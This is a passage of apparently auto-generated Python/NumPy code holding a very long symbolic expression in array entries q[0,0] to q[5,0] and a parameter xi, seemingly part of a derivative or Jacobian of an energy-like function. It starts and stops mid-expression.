0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-25283.9506172839*q[0, 0] + 12641.975308642*q[1, 0] + 12641.975308642*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 30441817.0865359*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 9621117498.95455*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 243534536.692287*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 3595939.64334705*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 25283.9506172839*q[0, 0]**2 + 25283.9506172839*q[0, 0]*q[1, 0] + 25283.9506172839*q[0, 0]*q[2, 0] - 25283.9506172839*q[1, 0]**2 + 25283.9506172839*q[1, 0]*q[2, 0] - 25283.9506172839*q[2, 0]**2 + 53.3333333333333) + 60131984.3684659*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 1522090.85432679*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 22474.6227709191*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 158.024691358025*q[0, 0]**2 + 158.024691358025*q[0, 0]*q[1, 0] + 158.024691358025*q[0, 0]*q[2, 0] - 158.024691358025*q[1, 0]**2 + 158.024691358025*q[1, 0]*q[2, 0] - 158.024691358025*q[2, 0]**2 + 1/3, 60131984.3684659*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 
0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1522090.85432679*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(-79.0123456790123*q[0, 0] - 79.0123456790123*q[1, 0] - 79.0123456790123*q[2, 0] - 35.5555555555555) + 22474.6227709191*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-51312626661.0909*(-5*q[0, 0] + 10*q[1, 0] - 5*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1623563577.94858*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 31963907.9408627*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 337119.341563786*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 1422.22222222222*q[0, 0] - 2844.44444444444*q[1, 0] + 
1422.22222222222*q[2, 0]) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-25283.9506172839*q[0, 0] + 12641.975308642*q[1, 0] + 12641.975308642*q[2, 0])*(-q[0, 0] + 2*q[1, 0] - q[2, 0]) + 2405279374.73864*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 30441817.0865359*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 898984.910836762*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 4810558749.47727*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*q[0, 0]**2 - 12641.975308642*q[0, 0]*q[1, 0] - 12641.975308642*q[0, 0]*q[2, 0] + 
12641.975308642*q[1, 0]**2 - 12641.975308642*q[1, 0]*q[2, 0] + 12641.975308642*q[2, 0]**2 - 26.6666666666667) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] + 2*q[1, 0] - q[2, 0]) + 4810558749.47727*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + 
q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)) + 60131984.3684659*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 1522090.85432679*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 22474.6227709191*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 158.024691358025*q[0, 0]**2 + 158.024691358025*q[0, 0]*q[1, 0] + 158.024691358025*q[0, 0]*q[2, 0] - 158.024691358025*q[1, 0]**2 + 158.024691358025*q[1, 0]*q[2, 0] - 158.024691358025*q[2, 0]**2 + 1/3, 60131984.3684659*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1522090.85432679*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(-79.0123456790123*q[0, 0] - 79.0123456790123*q[1, 0] - 79.0123456790123*q[2, 0] - 35.5555555555555) + 22474.6227709191*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 
2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-51312626661.0909*(-5*q[0, 0] - 5*q[1, 0] + 10*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1623563577.94858*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 31963907.9408627*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 337119.341563786*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 1422.22222222222*q[0, 0] + 1422.22222222222*q[1, 0] - 2844.44444444444*q[2, 0]) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-25283.9506172839*q[0, 0] + 12641.975308642*q[1, 0] + 12641.975308642*q[2, 0])*(-q[0, 0] - q[1, 0] + 2*q[2, 0]) + 2405279374.73864*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 30441817.0865359*(-3*q[0, 0] - 
3*q[1, 0] + 6*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 898984.910836762*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 4810558749.47727*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*q[0, 0]**2 - 12641.975308642*q[0, 0]*q[1, 0] - 12641.975308642*q[0, 0]*q[2, 0] + 12641.975308642*q[1, 0]**2 - 12641.975308642*q[1, 0]*q[2, 0] + 12641.975308642*q[2, 0]**2 - 26.6666666666667) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - 
q[2, 0])*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] - q[1, 0] + 2*q[2, 0]) - 4810558749.47727*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)) + 60131984.3684659*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 1522090.85432679*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 22474.6227709191*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 158.024691358025*q[0, 0]**2 + 158.024691358025*q[0, 0]*q[1, 0] + 158.024691358025*q[0, 0]*q[2, 0] - 158.024691358025*q[1, 0]**2 + 158.024691358025*q[1, 0]*q[2, 0] - 158.024691358025*q[2, 0]**2 + 1/3, (4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 
0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])) + (2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 
